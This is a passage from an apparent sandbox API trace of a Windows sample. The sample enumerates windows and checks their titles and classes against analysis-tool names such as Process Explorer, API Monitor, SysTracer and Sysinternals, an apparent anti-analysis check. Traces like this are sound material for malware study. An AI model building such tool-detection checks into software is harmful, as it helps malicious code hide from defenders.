lstrcpynA (in: lpString1=0x340df8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.686] lstrcpynA (in: lpString1=0x341200, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.686] GetClassNameA (in: hWnd=0x10056, lpClassName=0x340df8, nMaxCount=1024 | out: lpClassName="Shell_TrayWnd") returned 13 [0158.686] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="1024") returned 4 [0158.686] lstrcpynA (in: lpString1=0x341200, lpString2="Shell_TrayWnd", iMaxLength=1024 | out: lpString1="Shell_TrayWnd") returned="Shell_TrayWnd" [0158.686] lstrcpyA (in: lpString1=0x430c00, lpString2="Shell_TrayWnd" | out: lpString1="Shell_TrayWnd") returned="Shell_TrayWnd" [0158.686] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="65622") returned 5 [0158.687] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.687] lstrlenA (lpString="0") returned 1 [0158.687] lstrcpynA (in: lpString1=0x42e3a0, lpString2="Shell_TrayWnd", iMaxLength=1024 | out: lpString1="Shell_TrayWnd") returned="Shell_TrayWnd" [0158.687] lstrlenA (lpString="Shell_TrayWnd") returned 13 [0158.687] lstrcpynA (in: lpString1=0x40ac18, lpString2="Shell_TrayWnd", iMaxLength=1024 | out: lpString1="Shell_TrayWnd") returned="Shell_TrayWnd" [0158.687] lstrcpynA (in: lpString1=0x40b018, lpString2="PROCEXPL", iMaxLength=1024 | out: lpString1="PROCEXPL") returned="PROCEXPL" [0158.687] lstrcmpiA (lpString1="Shell_TrayWnd", lpString2="PROCEXPL") returned 1 [0158.687] lstrcpyA (in: lpString1=0x340df8, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.687] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.687] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.687] strstr (_Str="", _SubStr="- main thread") returned 0x0 [0158.687] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="0") returned 1 
[0158.687] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.687] lstrcpyA (in: lpString1=0x341200, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.687] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.687] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.688] strstr (_Str="", _SubStr="API Monitor") returned 0x0 [0158.688] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="0") returned 1 [0158.688] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.688] lstrcpyA (in: lpString1=0x340df8, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.688] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.688] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.688] strstr (_Str="", _SubStr="Blue Project Software SysTracer") returned 0x0 [0158.688] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="0") returned 1 [0158.688] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.688] lstrcpyA (in: lpString1=0x341200, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.688] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.688] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.688] strstr (_Str="", _SubStr="sysinternals") returned 0x0 [0158.688] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="0") returned 1 [0158.688] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.689] wsprintfA (in: param_1=0x18f784, param_2="callback%d" | out: param_1="callback1") returned 9 [0158.689] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="0") 
returned 1 [0158.689] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="65810") returned 5 [0158.689] lstrcpyA (in: lpString1=0x430400, lpString2="65810" | out: lpString1="65810") returned="65810" [0158.689] lstrcpynA (in: lpString1=0x340df8, lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.689] lstrcpyA (in: lpString1=0x341200, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.689] lstrcpyA (in: lpString1=0x327a20, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.689] lstrcpyA (in: lpString1=0x327e20, lpString2="GetWindowText" | out: lpString1="GetWindowText") returned="GetWindowText" [0158.689] GetWindowTextA (in: hWnd=0x10112, lpString=0x340df8, nMaxCount=1024 | out: lpString="") returned 0 [0158.689] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="1024") returned 4 [0158.689] lstrcpynA (in: lpString1=0x3401e0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.689] lstrcpyA (in: lpString1=0x430800, lpString2="" | out: lpString1="") returned="" [0158.689] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="65810") returned 5 [0158.690] lstrcpyA (in: lpString1=0x340df8, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.690] lstrcpyA (in: lpString1=0x327a20, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.690] lstrcpyA (in: lpString1=0x327e20, lpString2="GetClassName" | out: lpString1="GetClassName") returned="GetClassName" [0158.690] GetClassNameA (in: hWnd=0x10112, lpClassName=0x3401e0, nMaxCount=1024 | out: lpClassName="tooltips_class32") returned 16 [0158.690] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="1024") returned 4 [0158.690] lstrcpynA (in: lpString1=0x341200, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.690] lstrcpyA (in: lpString1=0x430c00, lpString2="tooltips_class32" | out: 
lpString1="tooltips_class32") returned="tooltips_class32" [0158.690] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="65810") returned 5 [0158.690] lstrcpyA (in: lpString1=0x3401e0, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.690] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.690] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.690] strstr (_Str="", _SubStr="- main thread") returned 0x0 [0158.690] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="0") returned 1 [0158.690] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.690] lstrcpyA (in: lpString1=0x341200, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.690] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.691] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.691] strstr (_Str="", _SubStr="API Monitor") returned 0x0 [0158.691] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="0") returned 1 [0158.691] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.691] lstrcpyA (in: lpString1=0x3401e0, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.691] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.691] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.691] strstr (_Str="", _SubStr="Blue Project Software SysTracer") returned 0x0 [0158.691] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="0") returned 1 [0158.691] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.691] lstrcpyA (in: lpString1=0x341200, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.691] lstrcpyA 
(in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.691] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.691] strstr (_Str="", _SubStr="sysinternals") returned 0x0 [0158.691] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="0") returned 1 [0158.691] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.692] wsprintfA (in: param_1=0x18f784, param_2="callback%d" | out: param_1="callback1") returned 9 [0158.692] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="0") returned 1 [0158.692] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="65798") returned 5 [0158.692] lstrcpyA (in: lpString1=0x430400, lpString2="65798" | out: lpString1="65798") returned="65798" [0158.692] lstrcpynA (in: lpString1=0x3401e0, lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.692] lstrcpyA (in: lpString1=0x341200, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.692] lstrcpyA (in: lpString1=0x327a20, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.692] lstrcpyA (in: lpString1=0x327e20, lpString2="GetWindowText" | out: lpString1="GetWindowText") returned="GetWindowText" [0158.692] GetWindowTextA (in: hWnd=0x10106, lpString=0x3401e0, nMaxCount=1024 | out: lpString="") returned 0 [0158.692] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="1024") returned 4 [0158.692] lstrcpynA (in: lpString1=0x340df8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.692] lstrcpyA (in: lpString1=0x430800, lpString2="" | out: lpString1="") returned="" [0158.692] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="65798") returned 5 [0158.692] lstrcpyA (in: lpString1=0x3401e0, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.693] lstrcpyA (in: lpString1=0x327a20, lpString2="user32" | out: 
lpString1="user32") returned="user32" [0158.693] lstrcpyA (in: lpString1=0x327e20, lpString2="GetClassName" | out: lpString1="GetClassName") returned="GetClassName" [0158.693] GetClassNameA (in: hWnd=0x10106, lpClassName=0x340df8, nMaxCount=1024 | out: lpClassName="tooltips_class32") returned 16 [0158.693] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="1024") returned 4 [0158.693] lstrcpynA (in: lpString1=0x341200, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.693] lstrcpyA (in: lpString1=0x430c00, lpString2="tooltips_class32" | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.693] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="65798") returned 5 [0158.693] lstrcpyA (in: lpString1=0x340df8, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.693] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.693] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.693] strstr (_Str="", _SubStr="- main thread") returned 0x0 [0158.693] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="0") returned 1 [0158.693] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.693] lstrcpyA (in: lpString1=0x341200, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.693] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.693] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.694] strstr (_Str="", _SubStr="API Monitor") returned 0x0 [0158.694] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="0") returned 1 [0158.694] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.694] lstrcpyA (in: lpString1=0x340df8, lpString2="ntdll" | out: 
lpString1="ntdll") returned="ntdll" [0158.694] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.694] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.694] strstr (_Str="", _SubStr="Blue Project Software SysTracer") returned 0x0 [0158.694] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="0") returned 1 [0158.694] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.694] lstrcpyA (in: lpString1=0x341200, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.694] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.694] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.694] strstr (_Str="", _SubStr="sysinternals") returned 0x0 [0158.694] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="0") returned 1 [0158.694] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.695] wsprintfA (in: param_1=0x18f784, param_2="callback%d" | out: param_1="callback1") returned 9 [0158.695] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="0") returned 1 [0158.695] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="65780") returned 5 [0158.695] lstrcpyA (in: lpString1=0x430400, lpString2="65780" | out: lpString1="65780") returned="65780" [0158.695] lstrcpynA (in: lpString1=0x340df8, lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.695] lstrcpyA (in: lpString1=0x341200, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.695] lstrcpyA (in: lpString1=0x327a20, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.695] lstrcpyA (in: lpString1=0x327e20, lpString2="GetWindowText" | out: lpString1="GetWindowText") returned="GetWindowText" [0158.695] GetWindowTextA (in: 
hWnd=0x100f4, lpString=0x340df8, nMaxCount=1024 | out: lpString="") returned 0 [0158.695] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="1024") returned 4 [0158.695] lstrcpynA (in: lpString1=0x3401e0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.695] lstrcpyA (in: lpString1=0x430800, lpString2="" | out: lpString1="") returned="" [0158.695] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="65780") returned 5 [0158.695] lstrcpyA (in: lpString1=0x340df8, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.696] lstrcpyA (in: lpString1=0x327a20, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.696] lstrcpyA (in: lpString1=0x327e20, lpString2="GetClassName" | out: lpString1="GetClassName") returned="GetClassName" [0158.696] GetClassNameA (in: hWnd=0x100f4, lpClassName=0x3401e0, nMaxCount=1024 | out: lpClassName="tooltips_class32") returned 16 [0158.696] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="1024") returned 4 [0158.696] lstrcpynA (in: lpString1=0x341200, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.696] lstrcpyA (in: lpString1=0x430c00, lpString2="tooltips_class32" | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.696] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="65780") returned 5 [0158.696] lstrcpyA (in: lpString1=0x3401e0, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.696] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.696] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.696] strstr (_Str="", _SubStr="- main thread") returned 0x0 [0158.696] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="0") returned 1 [0158.696] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.696] 
lstrcpyA (in: lpString1=0x341200, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.696] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.696] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.697] strstr (_Str="", _SubStr="API Monitor") returned 0x0 [0158.697] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="0") returned 1 [0158.697] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.697] lstrcpyA (in: lpString1=0x3401e0, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.697] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.697] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.697] strstr (_Str="", _SubStr="Blue Project Software SysTracer") returned 0x0 [0158.697] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="0") returned 1 [0158.697] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.697] lstrcpyA (in: lpString1=0x341200, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.697] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.697] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.697] strstr (_Str="", _SubStr="sysinternals") returned 0x0 [0158.697] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="0") returned 1 [0158.697] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.698] wsprintfA (in: param_1=0x18f784, param_2="callback%d" | out: param_1="callback1") returned 9 [0158.698] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="0") returned 1 [0158.698] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="65740") returned 5 
[0158.698] lstrcpyA (in: lpString1=0x430400, lpString2="65740" | out: lpString1="65740") returned="65740" [0158.698] lstrcpynA (in: lpString1=0x3401e0, lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.698] lstrcpyA (in: lpString1=0x341200, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.698] lstrcpyA (in: lpString1=0x327a20, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.698] lstrcpyA (in: lpString1=0x327e20, lpString2="GetWindowText" | out: lpString1="GetWindowText") returned="GetWindowText" [0158.698] GetWindowTextA (in: hWnd=0x100cc, lpString=0x3401e0, nMaxCount=1024 | out: lpString="") returned 0 [0158.698] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="1024") returned 4 [0158.698] lstrcpynA (in: lpString1=0x340df8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.698] lstrcpyA (in: lpString1=0x430800, lpString2="" | out: lpString1="") returned="" [0158.698] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="65740") returned 5 [0158.698] lstrcpyA (in: lpString1=0x3401e0, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.698] lstrcpyA (in: lpString1=0x327a20, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.699] lstrcpyA (in: lpString1=0x327e20, lpString2="GetClassName" | out: lpString1="GetClassName") returned="GetClassName" [0158.699] GetClassNameA (in: hWnd=0x100cc, lpClassName=0x340df8, nMaxCount=1024 | out: lpClassName="tooltips_class32") returned 16 [0158.699] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="1024") returned 4 [0158.699] lstrcpynA (in: lpString1=0x341200, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.699] lstrcpyA (in: lpString1=0x430c00, lpString2="tooltips_class32" | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.699] wsprintfA (in: param_1=0x341200, 
param_2="%d" | out: param_1="65740") returned 5 [0158.699] lstrcpyA (in: lpString1=0x340df8, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.699] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.699] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.699] strstr (_Str="", _SubStr="- main thread") returned 0x0 [0158.699] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="0") returned 1 [0158.699] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.699] lstrcpyA (in: lpString1=0x341200, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.699] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.699] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.699] strstr (_Str="", _SubStr="API Monitor") returned 0x0 [0158.700] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="0") returned 1 [0158.700] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.700] lstrcpyA (in: lpString1=0x340df8, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.700] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.700] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.700] strstr (_Str="", _SubStr="Blue Project Software SysTracer") returned 0x0 [0158.700] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="0") returned 1 [0158.700] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.700] lstrcpyA (in: lpString1=0x341200, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.700] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.700] 
lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.700] strstr (_Str="", _SubStr="sysinternals") returned 0x0 [0158.700] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="0") returned 1 [0158.700] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.701] wsprintfA (in: param_1=0x18f784, param_2="callback%d" | out: param_1="callback1") returned 9 [0158.701] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="0") returned 1 [0158.701] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="327868") returned 6 [0158.701] lstrcpyA (in: lpString1=0x430400, lpString2="327868" | out: lpString1="327868") returned="327868" [0158.701] lstrcpynA (in: lpString1=0x340df8, lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.701] lstrcpyA (in: lpString1=0x341200, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.701] lstrcpyA (in: lpString1=0x327a20, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.701] lstrcpyA (in: lpString1=0x327e20, lpString2="GetWindowText" | out: lpString1="GetWindowText") returned="GetWindowText" [0158.701] GetWindowTextA (in: hWnd=0x500bc, lpString=0x340df8, nMaxCount=1024 | out: lpString="") returned 0 [0158.701] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="1024") returned 4 [0158.701] lstrcpynA (in: lpString1=0x3401e0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.701] lstrcpyA (in: lpString1=0x430800, lpString2="" | out: lpString1="") returned="" [0158.701] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="327868") returned 6 [0158.701] lstrcpyA (in: lpString1=0x340df8, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.701] lstrcpyA (in: lpString1=0x327a20, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.701] lstrcpyA (in: lpString1=0x327e20, 
lpString2="GetClassName" | out: lpString1="GetClassName") returned="GetClassName" [0158.702] GetClassNameA (in: hWnd=0x500bc, lpClassName=0x3401e0, nMaxCount=1024 | out: lpClassName="tooltips_class32") returned 16 [0158.702] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="1024") returned 4 [0158.702] lstrcpynA (in: lpString1=0x341200, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.702] lstrcpyA (in: lpString1=0x430c00, lpString2="tooltips_class32" | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.702] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="327868") returned 6 [0158.702] lstrcpyA (in: lpString1=0x3401e0, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.702] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.702] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.702] strstr (_Str="", _SubStr="- main thread") returned 0x0 [0158.702] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="0") returned 1 [0158.702] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.702] lstrcpyA (in: lpString1=0x341200, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.702] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.702] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.702] strstr (_Str="", _SubStr="API Monitor") returned 0x0 [0158.703] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="0") returned 1 [0158.703] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.703] lstrcpyA (in: lpString1=0x3401e0, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.703] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" 
| out: lpString1="ntdll") returned="ntdll" [0158.703] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.703] strstr (_Str="", _SubStr="Blue Project Software SysTracer") returned 0x0 [0158.703] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="0") returned 1 [0158.703] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.703] lstrcpyA (in: lpString1=0x341200, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.703] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.703] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.703] strstr (_Str="", _SubStr="sysinternals") returned 0x0 [0158.703] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="0") returned 1 [0158.703] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.703] wsprintfA (in: param_1=0x18f784, param_2="callback%d" | out: param_1="callback1") returned 9 [0158.704] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="0") returned 1 [0158.704] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="65716") returned 5 [0158.704] lstrcpyA (in: lpString1=0x430400, lpString2="65716" | out: lpString1="65716") returned="65716" [0158.704] lstrcpynA (in: lpString1=0x3401e0, lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.704] lstrcpyA (in: lpString1=0x341200, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.704] lstrcpyA (in: lpString1=0x327a20, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.704] lstrcpyA (in: lpString1=0x327e20, lpString2="GetWindowText" | out: lpString1="GetWindowText") returned="GetWindowText" [0158.704] GetWindowTextA (in: hWnd=0x100b4, lpString=0x3401e0, nMaxCount=1024 | out: lpString="") returned 0 [0158.704] wsprintfA (in: 
param_1=0x340df8, param_2="%d" | out: param_1="1024") returned 4 [0158.704] lstrcpynA (in: lpString1=0x340df8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.704] lstrcpyA (in: lpString1=0x430800, lpString2="" | out: lpString1="") returned="" [0158.704] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="65716") returned 5 [0158.704] lstrcpyA (in: lpString1=0x3401e0, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.704] lstrcpyA (in: lpString1=0x327a20, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.704] lstrcpyA (in: lpString1=0x327e20, lpString2="GetClassName" | out: lpString1="GetClassName") returned="GetClassName" [0158.705] GetClassNameA (in: hWnd=0x100b4, lpClassName=0x340df8, nMaxCount=1024 | out: lpClassName="TaskListThumbnailWnd") returned 20 [0158.705] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="1024") returned 4 [0158.705] lstrcpynA (in: lpString1=0x341200, lpString2="TaskListThumbnailWnd", iMaxLength=1024 | out: lpString1="TaskListThumbnailWnd") returned="TaskListThumbnailWnd" [0158.705] lstrcpyA (in: lpString1=0x430c00, lpString2="TaskListThumbnailWnd" | out: lpString1="TaskListThumbnailWnd") 